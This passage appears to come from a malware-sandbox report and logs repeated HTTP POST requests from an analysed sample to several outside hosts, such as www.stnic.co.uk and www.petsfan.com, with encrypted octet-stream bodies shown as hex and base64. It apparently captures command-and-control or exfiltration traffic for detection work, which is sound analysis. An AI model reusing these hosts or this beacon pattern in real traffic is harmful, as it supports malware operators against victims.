79 52 4f 41 79 52 30 70 43 44 4d 31 66 49 2b 6f 48 42 6a 54 4c 4e 70 64 37 65 6d 53 30 4b 38 2f 36 4e 77 4c 41 47 6e 66 6e 30 31 51 77 37 79 72 52 74 51 6e 33 72 66 61 37 51 64 57 33 4a 64 66 45 73 57 76 66 6e 39 35 75 38 41 32 54 7a 50 34 54 44 69 45 4c 52 57 70 32 35 76 52 62 63 49 6e 4a 6c 77 51 37 39 44 66 70 39 64 6e 34 70 6a 57 6a 55 48 71 5a 4e 74 68 47 77 62 2b 4e 42 61 34 67 64 6f 55 6d 6d 35 31 52 4e 4a 69 4d 45 31 64 43 39 65 74 4c 4e 33 47 42 36 72 5a 74 39 58 37 45 36 39 61 47 45 4f 38 58 70 36 2f 5a 70 2b 6f 61 69 6a 5a 6b 36 35 6c 6a 46 53 43 32 39 4a 55 69 4d 61 72 55 72 79 57 2b 6b 74 6b 4a 34 63 66 44 74 7a 56 6b 79 62 4a 32 4e 4a 7a 6c 61 4f 71 46 31 70 38 50 63 38 6d 75 4c 57 36 77 45 47 42 2b 7a 59 66 78 36 2f 69 38 4e 4a 47 48 76 77 65 75 6a 53 69 2f 47 6a 51 72 31 47 34 53 42 6d 75 51 6d 52 71 6c 70 6c 57 6b 44 41 56 6d 38 5a 52 71 61 37 47 65 4f 2f 56 70 6e 62 5a 34 30 48 4a 63 6c 4e 34 74 37 4d 71 74 70 63 53 47 38 71 32 68 73 33 74 64 42 37 66 4c 72 57 32 62 74 30 53 6d 39 4e 69 61 63 42 4c 5a 57 7a 39 6e 43 48 68 35 48 49 6d 6c 4c 77 56 4b 63 4b 77 63 53 65 34 75 52 58 73 4d 6b 78 5a 33 61 65 6a 76 45 34 62 51 7a 42 6e 57 49 4b 4a 34 62 66 76 63 58 74 38 6f 31 6c 55 71 57 37 58 6d 7a 31 69 2f 6f 4b 6f 31 2f 72 2f 6a 42 50 65 4a 4c 51 4f 64 4f 77 3d Data Ascii: LIQPEq3s7VX15U/TpOa1gmaRR9ObEdvgMdgR+sgbN+Pw7Y20Edvby5F2ANxuwWzRGoB3HZSp05zE9QRsVguuAfrvrJI3wI6j1TscKlzNoNMc+FlhaGoZfV8JMZxSsN4WtyJXfXB/yROAyR0pCDM1fI+oHBjTLNpd7emS0K8/6NwLAGnfn01Qw7yrRtQn3rfa7QdW3JdfEsWvfn95u8A2TzP4TDiELRWp25vRbcInJlwQ79Dfp9dn4pjWjUHqZNthGwb+NBa4gdoUmm51RNJiME1dC9etLN3GB6rZt9X7E69aGEO8Xp6/Zp+oaijZk65ljFSC29JUiMarUryW+ktkJ4cfDtzVkybJ2NJzlaOqF1p8Pc8muLW6wEGB+zYfx6/i8NJGHvweujSi/GjQr1G4SBmuQmRqlplWkDAVm8ZRqa7GeO/VpnbZ40HJclN4t7MqtpcSG8q2hs3tdB7fLrW2bt0Sm9NiacBLZWz9nCHh5HImlLwVKcKwcSe4uRXsMkxZ3aejvE4bQzBnWIKJ4bfvcXt8o1lUqW7Xmz1i/oKo1/r/jBPeJLQOdOw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 2b 4b 64 33 47 70 41 79 37 6c 56 36 49 54 50 69 49 2b 53 38 63 55 4e 49 4f 35 75 34 62 48 72 2b 78 45 4b 54 50 4b 54 42 65 68 62 6c 41 76 39 4c 47 57 41 53 46 66 36 54 35 4d 47 35 6b 64 63 66 76 59 5a 76 77 56 49 43 45 69 77 51 4a 2f 47 42 2f 38 49 77 47 73 4d 76 74 53 6a 6c 48 6c 34 42 69 67 4d 38 56 7a 71 52 5a 30 4d 46 4f 2f 36 63 75 35 31 6c 79 65 61 43 53 51 48 39 4a 74 33 6e 2f 53 76 6a 42 75 76 4e 54 57 63 45 41 35 69 57 35 31 67 45 49 6c 41 32 6a 45 45 66 57 59 67 37 62 71 6a 52 6c 34 56 48 72 62 37 4f 4d 6b 4c 78 72 42 52 70 4a 4a 58 31 71 45 73 4e 4b 49 4b 53 4c 32 36 2b 61 71 30 6f 66 38 76 6f 48 42 64 63 37 71 6f 76 74 6a 62 59 2f 45 61 78 75 49 46 4c 55 6e 5a 35 63 6d 51 4e 4a 30 4c 73 44 6b 34 75 5a 37 6f 76 2f 61 76 5a 54 68 53 62 68 53 44 57 74 73 74 43 37 72 36 65 32 53 6a 37 71 5a 4a 2b 39 44 63 6f 6f 72 43 72 4c 76 7a 65 66 63 37 4a 51 53 6e 6f 58 55 6c 64 71 33 69 45 6b 52 71 34 4c 6f 45 58 77 30 70 54 2f 4d 39 74 42 66 31 59 48 6b 4c 63 4c 34 30 44 4f 47 6a 39 51 73 62 58 51 70 7a 75 6a 78 39 73 30 4e 52 39 72 41 33 77 2b 79 6b 35 53 7a 58 6f 50 6f 65 38 59 2f 65 45 43 56 6c 46 65 34 63 44 51 6d 49 2b 61 48 58 67 79 48 2b 6f 2b 72 76 50 48 2f 76 73 6c 34 70 41 6f 56 35 79 48 59 55 61 6a 30 55 70 2b 33 71 55 7a 35 64 71 63 2f 79 7a 31 31 6d 66 55 6a 64 30 66 76 38 64 59 74 35 74 47 50 51 36 7a 68 2b 65 6f 71 50 5a 6f 4f 48 4f 2b 64 38 4a 6b 76 39 76 73 69 6b 7a 49 51 4d 62 66 5a 4c 62 73 65 37 4e 65 54 41 54 50 63 5a 7a 45 6a 5a 4b 5a 4c 61 77 4f 37 33 45 45 6b 48 41 79 45 43 74 65 72 70 37 62 72 36 58 36 69 30 54 6f 55 69 74 6f 64 64 52 59 4e 66 64 45 7a 30 6c 48 6e 68 2b 74 71 4d 42 6b 38 33 37 4e 73 35 58 31 51 31 44 Data Ascii: +Kd3GpAy7lV6ITPiI+S8cUNIO5u4bHr+xEKTPKTBehblAv9LGWASFf6T5MG5kdcfvYZvwVICEiwQJ/GB/8IwGsMvtSjlHl4BigM8VzqRZ0MFO/6cu51lyeaCSQH9Jt3n/SvjBuvNTWcEA5iW51gEIlA2jEEfWYg7bqjRl4VHrb7OMkLxrBRpJJX1qEsNKIKSL26+aq0of8voHBdc7qovtjbY/EaxuIFLUnZ5cmQNJ0LsDk4uZ7ov/avZThSbhSDWtstC7r6e2Sj7qZJ+9DcoorCrLvzefc7JQSnoXUldq3iEkRq4LoEXw0pT/M9tBf1YHkLcL40DOGj9QsbXQpzujx9s0NR9rA3w+yk5SzXoPoe8Y/eECVlFe4cDQmI+aHXgyH+o+rvPH/vsl4pAoV5yHYUaj0Up+3qUz5dqc/yz11mfUjd0fv8dYt5tGPQ6zh+eoqPZoOHO+d8Jkv9vsikzIQMbfZLbse7NeTATPcZzEjZKZLawO73EEkHAyECterp7br6X6i0ToUitoddRYNfdEz0lHnh+tqMBk837Ns5X1Q1D
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 49 36 68 65 48 61 39 4b 37 6c 56 51 42 6b 59 62 7a 6e 68 68 31 72 68 59 76 72 50 46 4c 46 41 52 55 79 30 4d 30 43 46 2b 55 34 4e 61 46 50 45 48 4d 58 70 50 30 56 42 47 36 77 6d 70 4c 6d 79 42 35 32 54 47 58 61 33 4e 48 4f 59 39 78 2f 62 31 41 68 37 45 45 42 76 55 39 70 51 53 66 31 45 4a 54 62 49 44 75 63 53 46 64 4e 5a 4f 51 62 61 59 4a 4a 36 5a 4b 55 2f 34 31 4c 4e 50 68 6b 79 4b 4d 48 4d 77 43 31 31 48 4b 30 4e 42 5a 2b 2b 48 4e 58 37 64 2b 6c 30 45 45 54 57 53 43 66 46 6b 39 47 74 67 56 4e 66 31 48 48 54 54 74 7a 63 41 4c 57 61 43 54 55 79 52 6a 4c 58 74 6d 56 71 66 34 41 57 6c 42 2f 39 4c 7a 6d 6f 37 62 6d 41 6c 79 49 49 63 55 6d 4c 38 49 51 30 49 58 5a 36 39 57 79 53 63 74 47 6d 6d 4d 6b 68 4e 51 76 47 4e 55 7a 35 4a 44 4a 42 7a 64 50 62 51 6e 30 56 4b 63 6b 73 37 51 4a 49 37 48 44 49 73 68 6a 50 66 46 30 6b 33 37 48 6c 36 51 50 75 74 76 31 69 6d 67 35 7a 68 57 55 48 45 32 62 47 63 44 66 32 6e 4b 53 78 4e 72 48 62 45 38 39 79 2b 56 45 74 2b 59 2f 43 6f 61 77 47 50 30 77 44 32 41 6b 5a 65 6c 69 59 55 36 6d 5a 6d 77 79 52 57 76 50 37 45 7a 4b 36 62 6f 4a 4e 4f 62 6e 43 67 62 4c 4d 78 74 32 71 30 68 4e 69 6c 75 52 66 72 2b 58 56 73 33 74 47 53 4b 39 78 5a 5a 32 45 6f 6e 6c 50 6b 4e 72 76 78 69 44 43 75 45 79 44 75 55 71 73 73 4e 65 4d 38 73 34 42 4a 76 58 32 70 47 68 58 35 2b 75 62 74 62 77 63 4e 4b 43 6e 79 6b 6b 41 7a 2f 38 46 73 63 52 70 34 36 51 73 47 68 5a 2f 33 51 65 76 34 2f 66 68 38 56 6d 5a 41 50 32 71 52 58 72 4a 4a 70 6d 55 64 61 32 36 51 59 31 36 46 44 34 4f 49 71 62 61 53 47 4a 41 73 58 33 6b 53 6e 4f 77 47 70 78 78 37 31 71 6d 50 64 4b 75 34 52 30 58 53 45 53 38 35 56 4c 35 70 36 6a 34 33 47 78 36 2f 38 65 74 43 5a 6a 75 6b 6a 4a 31 34 66 69 6f 41 6c 56 6a 45 4a 6a 72 51 74 73 64 33 36 46 64 39 51 4e 70 62 6d 70 4b 35 61 42 37 4c 62 74 4b 66 7a 33 6c 2f 70 44 31 6f Data Ascii: I6heHa9K7lVQBkYbznhh1rhYvrPFLFARUy0M0CF+U4NaFPEHMXpP0VBG6wmpLmyB52TGXa3NHOY9x/b1Ah7EEBvU9pQSf1EJTbIDucSFdNZOQbaYJJ6ZKU/41LNPhkyKMHMwC11HK0NBZ++HNX7d+l0EETWSCfFk9GtgVNf1HHTTtzcALWaCTUyRjLXtmVqf4AWlB/9Lzmo7bmAlyIIcUmL8IQ0IXZ69WySctGmmMkhNQvGNUz5JDJBzdPbQn0VKcks7QJI7HDIshjPfF0k37Hl6QPutv1img5zhWUHE2bGcDf2nKSxNrHbE89y+VEt+Y/CoawGP0wD2AkZeliYU6mZmwyRWvP7EzK6boJNObnCgbLMxt2q0hNiluRfr+XVs3tGSK9xZZ2EonlPkNrvxiDCuEyDuUqssNeM8s4BJvX2pGhX5+ubtbwcNKCnykkAz/8FscRp46QsGhZ/3Qev4/fh8VmZAP2qRXrJJpmUda26QY16FD4OIqbaSGJAsX3kSnOwGpxx71qmPdKu4R0XSES85VL5p6j43Gx6/8etCZjukjJ14fioAlVjEJjrQtsd36Fd9QNpbmpK5aB7LbtKfz3l/pD1o
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 6d 46 66 56 5a 6c 49 62 57 59 34 2f 50 56 66 54 42 51 4c 61 6f 6c 57 6f 35 4a 32 69 65 52 33 2f 70 6d 37 61 66 6f 56 4b 34 35 33 55 69 71 38 72 4e 74 72 6c 32 77 69 45 7a 6c 41 4c 63 77 4f 4f 33 6a 51 72 4b 36 4c 70 41 4c 63 61 51 64 55 65 54 6d 49 46 71 41 4d 5a 64 51 31 79 72 6b 39 43 49 75 52 70 31 78 64 6a 36 41 55 6f 70 53 6b 78 59 68 7a 62 49 79 6d 4d 43 4c 64 79 72 69 6c 53 68 58 6b 71 45 37 5a 37 46 43 5a 6c 52 70 6e 46 4b 64 31 58 62 63 47 31 51 6e 2b 4e 58 48 31 4f 63 50 63 70 41 5a 62 76 33 52 4a 68 77 4c 6d 57 51 6b 49 50 74 66 61 74 30 76 55 51 54 6a 2f 5a 62 58 38 64 31 34 36 61 75 4c 54 6e 79 67 2f 66 72 32 48 65 2f 62 6d 4d 42 36 6b 68 68 66 7a 66 34 59 57 55 6c 6a 43 6e 6b 31 6c 53 63 38 70 38 4f 33 6a 52 4b 78 30 67 51 6c 56 6b 65 47 4e 64 2b 68 57 70 41 30 78 6d 72 73 4c 2f 32 6f 44 67 69 69 44 75 37 7a 31 70 42 38 48 72 45 67 61 38 36 42 68 54 57 50 74 36 75 70 63 74 39 72 42 4c 31 6a 2f 2f 42 52 6a 41 6d 6e 58 59 53 53 46 79 6b 74 4a 50 52 52 2b 57 5a 57 7a 43 64 53 4f 79 61 55 75 58 51 55 6b 54 71 55 42 76 6d 71 74 74 51 5a 79 4b 36 5a 6b 37 6d 49 50 2b 44 6c 30 62 63 36 33 5a 58 7a 4f 57 30 30 7a 77 6a 37 39 39 4c 77 35 78 4b 4d 62 48 6c 61 77 53 69 37 52 46 4f 65 54 49 6a 5a 70 4b 52 43 32 48 47 70 69 68 52 61 72 61 72 49 59 74 65 71 39 53 6c 67 50 65 68 69 4e 47 35 32 4f 55 52 39 67 42 4e 65 4c 65 68 72 56 36 6a 4f 46 69 45 65 53 36 47 7a 5a 79 50 61 51 33 6d 71 50 46 41 51 4d 4b 39 46 70 57 33 47 35 57 76 4b 68 2f 69 4b 70 38 67 55 51 49 31 35 65 34 61 46 6f 7a 6b 6b 46 66 56 58 31 34 58 6a 30 4d 4a 31 67 63 73 74 44 4c 56 48 6c 50 61 71 79 72 37 50 69 4e 42 64 41 3d Data Ascii: mFfVZlIbWY4/PVfTBQLaolWo5J2ieR3/pm7afoVK453Uiq8rNtrl2wiEzlALcwOO3jQrK6LpALcaQdUeTmIFqAMZdQ1yrk9CIuRp1xdj6AUopSkxYhzbIymMCLdyrilShXkqE7Z7FCZlRpnFKd1XbcG1Qn+NXH1OcPcpAZbv3RJhwLmWQkIPtfat0vUQTj/ZbX8d146auLTnyg/fr2He/bmMB6khhfzf4YWUljCnk1lSc8p8O3jRKx0gQlVkeGNd+hWpA0xmrsL/2oDgiiDu7z1pB8HrEga86BhTWPt6upct9rBL1j//BRjAmnXYSSFyktJPRR+WZWzCdSOyaUuXQUkTqUBvmqttQZyK6Zk7mIP+Dl0bc63ZXzOW00zwj799Lw5xKMbHlawSi7RFOeTIjZpKRC2HGpihRararIYteq9SlgPehiNG52OUR9gBNeLehrV6jOFiEeS6GzZyPaQ3mqPFAQMK9FpW3G5WvKh/iKp8gUQI15e4aFozkkFfVX14Xj0MJ1gcstDLVHlPaqyr7PiNBdA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 38 51 71 74 46 31 73 62 37 6c 56 64 43 78 4a 79 63 70 68 50 4a 45 54 75 50 4c 7a 68 47 47 63 6b 76 30 71 49 55 74 54 4c 64 4d 53 2f 35 4f 72 74 38 52 4c 38 62 56 2f 64 2b 6a 31 39 45 72 4a 39 79 4d 4d 38 54 6f 6a 4a 70 5a 4e 53 71 78 2b 5a 79 52 6c 4e 54 49 71 38 62 67 2b 47 65 47 4d 58 70 6c 7a 64 53 48 44 71 6e 49 77 31 7a 37 6c 31 70 4c 73 64 52 48 78 5a 36 58 4b 57 52 69 53 33 73 56 4a 73 55 42 31 64 6f 39 30 79 38 43 69 2b 4d 57 64 73 44 74 2f 68 42 4f 6b 4b 36 5a 42 6a 67 42 6c 49 71 51 63 44 48 66 34 41 4c 74 61 4b 51 43 77 4f 4a 63 64 75 6f 48 65 4f 65 30 64 69 72 58 2b 73 64 43 76 58 36 31 4b 39 47 61 5a 61 67 30 57 77 6a 35 5a 46 50 6c 32 36 6d 7a 59 5a 46 48 4e 38 69 33 6e 69 78 63 54 64 6e 7a 51 55 6e 48 46 6c 34 31 6b 30 55 79 6c 78 5a 61 47 31 4b 64 4b 4e 61 4c 65 71 78 7a 76 41 34 75 36 79 4b 70 4c 56 75 38 72 79 57 5a 58 6b 72 33 6a 54 70 58 2f 6f 73 4d 68 2b 61 2b 58 4c 32 5a 34 6c 61 30 78 2f 50 35 43 63 43 43 70 78 71 66 68 6e 38 2b 75 43 38 66 72 61 4a 66 4c 30 67 72 63 38 2f 4f 52 6d 6d 58 46 4d 32 75 49 78 53 54 78 6d 45 4d 6c 39 64 53 62 39 38 53 6f 7a 76 54 73 65 37 31 50 56 51 6a 74 4d 46 63 48 4b 76 4d 6c 34 66 77 50 77 6c 68 4e 65 37 41 2f 6b 6f 39 2b 6a 58 61 79 37 64 32 2b 41 6f 5a 30 4d 2f 2f 35 35 78 71 32 33 5a 4f 77 2f 53 49 45 61 6f 41 57 4e 4e 54 6c 4d 54 4e 79 53 76 6f 67 56 66 4e 78 5a 70 67 46 79 6c 4a 49 37 6b 2b 48 78 2f 53 52 36 37 6f 39 45 5a 68 54 6f 4a 2f 45 48 47 6c 71 52 52 52 63 67 47 48 6e 72 2f 50 37 64 49 4a 52 35 33 71 69 39 54 49 66 42 51 36 68 75 50 2f 38 34 55 6d 4b 34 39 57 47 65 65 66 49 4e 73 59 4c 47 37 73 34 6b 54 47 52 48 73 37 4a 36 4d 42 79 39 62 52 4b 34 48 5a 48 33 2f 6d 37 2b 64 6c 63 36 35 4d 70 77 70 47 78 4e 45 74 43 6a 7a 59 2f 54 57 6a 37 6b 37 75 4e 63 58 41 66 73 64 41 61 4c 4d 71 2f 41 Data Ascii: 8QqtF1sb7lVdCxJycphPJETuPLzhGGckv0qIUtTLdMS/5Ort8RL8bV/d+j19ErJ9yMM8TojJpZNSqx+ZyRlNTIq8bg+GeGMXplzdSHDqnIw1z7l1pLsdRHxZ6XKWRiS3sVJsUB1do90y8Ci+MWdsDt/hBOkK6ZBjgBlIqQcDHf4ALtaKQCwOJcduoHeOe0dirX+sdCvX61K9GaZag0Wwj5ZFPl26mzYZFHN8i3nixcTdnzQUnHFl41k0UylxZaG1KdKNaLeqxzvA4u6yKpLVu8ryWZXkr3jTpX/osMh+a+XL2Z4la0x/P5CcCCpxqfhn8+uC8fraJfL0grc8/ORmmXFM2uIxSTxmEMl9dSb98SozvTse71PVQjtMFcHKvMl4fwPwlhNe7A/ko9+jXay7d2+AoZ0M//55xq23ZOw/SIEaoAWNNTlMTNySvogVfNxZpgFylJI7k+Hx/SR67o9EZhToJ/EHGlqRRRcgGHnr/P7dIJR53qi9TIfBQ6huP/84UmK49WGeefINsYLG7s4kTGRHs7J6MBy9bRK4HZH3/m7+dlc65MpwpGxNEtCjzY/TWj7k7uNcXAfsdAaLMq/A
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 2b 4b 64 33 47 70 41 79 37 6c 56 36 49 54 50 69 49 2b 53 38 63 55 4e 49 4f 35 75 34 62 48 72 2b 78 45 4b 54 50 4b 54 42 65 68 62 6c 41 76 39 4c 47 57 41 53 46 66 36 54 35 4d 47 35 6b 64 63 66 76 59 5a 76 77 56 49 43 45 69 77 51 4a 2f 47 42 2f 38 49 77 47 73 4d 76 74 53 6a 6c 48 6c 34 42 69 67 4d 38 56 7a 71 52 5a 30 4d 46 4f 2f 36 63 75 35 31 6c 79 65 61 43 53 51 48 39 4a 74 33 6e 2f 53 76 6a 42 75 76 4e 54 57 63 45 41 35 69 57 35 31 67 45 49 6c 41 32 6a 45 45 66 57 59 67 37 62 71 6a 52 6c 34 56 48 72 62 37 4f 4d 6b 4c 78 72 42 52 70 4a 4a 58 31 71 45 73 4e 4b 49 4b 53 4c 32 36 2b 61 71 30 6f 66 38 76 6f 48 42 64 63 37 71 6f 76 74 6a 62 59 2f 45 61 78 75 49 46 4c 55 6e 5a 35 63 6d 51 4e 4a 30 4c 73 44 6b 34 75 5a 37 6f 76 2f 61 76 5a 54 68 53 62 68 53 44 57 74 73 74 43 37 72 36 65 32 53 6a 37 71 5a 4a 2b 39 44 63 6f 6f 72 43 72 4c 76 7a 65 66 63 37 4a 51 53 6e 6f 58 55 6c 64 71 33 69 45 6b 52 71 34 4c 6f 45 58 77 30 70 54 2f 4d 39 74 42 66 31 59 48 6b 4c 63 4c 34 30 44 4f 47 6a 39 51 73 62 58 51 70 7a 75 6a 78 39 73 30 4e 52 39 72 41 33 77 2b 79 6b 35 53 7a 58 6f 50 6f 65 38 59 2f 65 45 43 56 6c 46 65 34 63 44 51 6d 49 2b 61 48 58 67 79 48 2b 6f 2b 72 76 50 48 2f 76 73 6c 34 70 41 6f 56 35 79 48 59 55 61 6a 30 55 70 2b 33 71 55 7a 35 64 71 63 2f 79 7a 31 31 6d 66 55 6a 64 30 66 76 38 64 59 74 35 74 47 50 51 36 7a 68 2b 65 6f 71 50 5a 6f 4f 48 4f 2b 64 38 4a 6b 76 39 76 73 69 6b 7a 49 51 4d 62 66 5a 4c 62 73 65 37 4e 65 54 41 54 50 63 5a 7a 45 6a 5a 4b 5a 4c 61 77 4f 37 33 45 45 6b 48 41 79 45 43 74 65 72 70 37 62 72 36 58 36 69 30 54 6f 55 69 74 6f 64 64 52 59 4e 66 64 45 7a 30 6c 48 6e 68 2b 74 71 4d 42 6b 38 33 37 4e 73 35 58 31 51 31 44 Data Ascii: +Kd3GpAy7lV6ITPiI+S8cUNIO5u4bHr+xEKTPKTBehblAv9LGWASFf6T5MG5kdcfvYZvwVICEiwQJ/GB/8IwGsMvtSjlHl4BigM8VzqRZ0MFO/6cu51lyeaCSQH9Jt3n/SvjBuvNTWcEA5iW51gEIlA2jEEfWYg7bqjRl4VHrb7OMkLxrBRpJJX1qEsNKIKSL26+aq0of8voHBdc7qovtjbY/EaxuIFLUnZ5cmQNJ0LsDk4uZ7ov/avZThSbhSDWtstC7r6e2Sj7qZJ+9DcoorCrLvzefc7JQSnoXUldq3iEkRq4LoEXw0pT/M9tBf1YHkLcL40DOGj9QsbXQpzujx9s0NR9rA3w+yk5SzXoPoe8Y/eECVlFe4cDQmI+aHXgyH+o+rvPH/vsl4pAoV5yHYUaj0Up+3qUz5dqc/yz11mfUjd0fv8dYt5tGPQ6zh+eoqPZoOHO+d8Jkv9vsikzIQMbfZLbse7NeTATPcZzEjZKZLawO73EEkHAyECterp7br6X6i0ToUitoddRYNfdEz0lHnh+tqMBk837Ns5X1Q1D
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 69 44 72 79 6e 38 66 6e 34 56 56 6d 2b 76 74 75 39 67 4b 77 50 5a 43 74 52 62 32 39 79 78 58 43 36 34 38 68 74 43 59 4c 35 73 55 39 37 59 57 6c 77 6f 65 66 70 6a 2f 33 69 59 63 75 75 63 6e 4c 43 6c 49 47 65 62 59 68 50 51 2f 4d 6f 72 61 72 42 7a 56 2b 67 44 6f 30 55 73 5a 73 55 45 4c 74 4e 34 2f 41 6c 67 4e 5a 50 4a 70 6d 52 43 6e 42 72 49 4f 2b 5a 62 2f 65 6e 32 52 65 6a 6b 78 4e 38 4c 45 74 44 31 58 73 68 62 49 46 42 55 35 71 66 37 62 4e 72 4b 49 4b 73 51 33 5a 2b 56 41 4d 45 73 6f 49 4e 55 4f 45 57 73 41 69 63 35 56 50 32 32 6b 50 63 6a 6e 68 32 4d 51 33 63 31 42 66 34 68 6f 4b 4b 37 5a 4f 37 32 57 6d 4b 48 53 4b 65 55 63 71 38 4e 46 57 32 39 69 32 35 46 6c 6e 31 59 7a 65 36 2f 73 51 2b 55 46 46 34 33 72 43 33 43 32 49 6b 33 58 5a 70 52 36 7a 49 6a 68 2b 2b 46 77 36 58 64 53 4b 4e 33 71 4b 53 35 6f 4a 42 55 78 51 52 71 61 6b 64 30 71 70 48 69 73 4d 4a 39 68 61 57 45 41 73 6a 41 71 62 6f 39 66 59 33 49 7a 39 6d 55 79 5a 44 34 73 6b 31 4f 41 31 76 79 68 47 2b 48 55 54 55 31 4b 79 53 69 52 6b 56 77 77 72 33 6e 55 35 6f 4d 4b 77 44 4f 4f 32 56 6d 4e 46 44 46 77 6f 66 36 54 73 46 68 34 36 4b 45 6b 46 72 64 66 49 42 46 4f 63 37 71 35 30 6a 6e 51 37 78 65 45 4e 77 56 52 6c 2f 51 46 78 76 5a 6a 64 56 53 76 52 72 4c 54 49 4b 78 32 58 35 35 69 6d 74 6d 52 74 68 33 50 31 2f 5a 37 63 44 61 32 65 41 37 31 4f 42 48 50 56 35 43 47 32 57 6e 41 62 43 50 64 44 45 37 67 35 53 44 34 5a 42 69 5a 63 4e 71 32 49 6d 32 54 69 53 6e 4b 75 33 68 79 33 34 4b 49 4c 57 47 6b 4d 34 75 6a 37 64 73 37 48 49 74 53 7a 54 77 55 6d 6c 47 57 42 58 61 55 39 78 6f 33 49 34 2b 68 49 56 70 39 53 6f 4b 6e 6b 72 5a 58 73 42 4c 6d 49 45 47 52 54 63 57 57 73 41 43 2b 43 7a 6f 6a 68 32 44 4a 67 6c 68 49 38 4a 6c 32 55 35 42 71 6a 47 74 38 41 38 31 6d 2b 4b 64 68 56 2b 4a 56 34 39 51 63 55 55 55 4e 2b Data Ascii: iDryn8fn4VVm+vtu9gKwPZCtRb29yxXC648htCYL5sU97YWlwoefpj/3iYcuucnLClIGebYhPQ/MorarBzV+gDo0UsZsUELtN4/AlgNZPJpmRCnBrIO+Zb/en2RejkxN8LEtD1XshbIFBU5qf7bNrKIKsQ3Z+VAMEsoINUOEWsAic5VP22kPcjnh2MQ3c1Bf4hoKK7ZO72WmKHSKeUcq8NFW29i25Fln1Yze6/sQ+UFF43rC3C2Ik3XZpR6zIjh++Fw6XdSKN3qKS5oJBUxQRqakd0qpHisMJ9haWEAsjAqbo9fY3Iz9mUyZD4sk1OA1vyhG+HUTU1KySiRkVwwr3nU5oMKwDOO2VmNFDFwof6TsFh46KEkFrdfIBFOc7q50jnQ7xeENwVRl/QFxvZjdVSvRrLTIKx2X55imtmRth3P1/Z7cDa2eA71OBHPV5CG2WnAbCPdDE7g5SD4ZBiZcNq2Im2TiSnKu3hy34KILWGkM4uj7ds7HItSzTwUmlGWBXaU9xo3I4+hIVp9SoKnkrZXsBLmIEGRTcWWsAC+Czojh2DJglhI8Jl2U5BqjGt8A81m+KdhV+JV49QcUUUN+
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 73 37 42 65 48 47 4e 43 37 6c 55 66 59 64 59 31 36 73 53 6d 41 34 79 53 48 51 79 4a 45 45 79 2f 52 2b 61 66 4d 47 47 51 55 4d 36 50 48 4e 79 30 5a 69 66 34 45 6f 64 53 38 63 2f 6b 74 4f 65 71 41 4e 68 33 59 67 4d 56 76 51 6c 32 38 49 71 47 59 45 63 61 2b 74 4a 44 67 76 47 4b 46 47 53 51 6b 6d 69 47 4e 61 63 47 64 66 37 75 38 6d 49 5a 6f 6b 37 30 42 6b 6a 4f 48 54 54 55 6c 73 4e 33 42 31 6d 74 39 4f 53 56 65 6e 37 46 58 64 4e 69 46 62 6b 52 77 77 42 55 4f 55 42 43 62 62 38 70 67 73 31 4a 49 49 31 35 6b 61 45 50 4c 53 2f 67 4d 59 70 51 74 34 76 5a 31 30 64 2f 6e 67 52 78 51 48 4f 48 48 49 34 74 77 72 31 57 39 41 64 56 56 30 66 53 4f 44 51 44 44 6b 30 77 49 68 57 65 71 56 7a 58 35 5a 32 61 36 56 79 64 61 6f 67 38 63 41 77 53 67 31 66 32 63 2f 67 32 62 55 31 41 53 66 2b 38 79 44 79 77 5a 48 68 56 34 78 56 61 4e 54 71 69 37 32 66 42 79 47 6b 43 33 64 55 6e 59 76 74 69 31 64 74 76 4f 34 58 7a 30 70 6c 57 67 48 56 30 4e 34 68 46 51 75 61 50 39 5a 43 59 56 55 65 31 6b 4a 6b 4b 4b 41 37 55 66 34 35 43 35 70 35 37 34 7a 57 30 2b 30 61 6e 71 58 55 76 56 50 63 6a 55 55 43 69 78 6d 70 56 4d 6f 6a 4a 33 44 34 6a 52 53 31 56 50 51 48 4f 50 54 73 4d 6f 31 68 59 50 47 42 63 41 57 38 6b 46 6f 62 37 6f 59 78 65 47 72 49 79 62 34 6f 44 2b 37 6c 75 45 62 67 71 47 57 6a 63 6b 2f 52 44 75 43 71 44 4e 48 36 4d 45 68 2b 45 6c 2b 74 51 43 38 4b 76 5a 51 55 50 50 31 4e 34 6e 66 52 7a 58 70 51 6b 5a 70 73 7a 64 4f 42 54 50 78 4f 77 77 48 43 42 47 65 58 6c 49 32 45 49 36 57 53 44 65 63 70 41 76 53 55 32 4b 51 53 30 42 70 59 73 5a 43 70 49 45 75 2f 5a 50 70 39 4e 31 46 57 57 6b 34 64 55 38 35 56 44 50 50 6a 58 2b 58 38 43 Data Ascii: 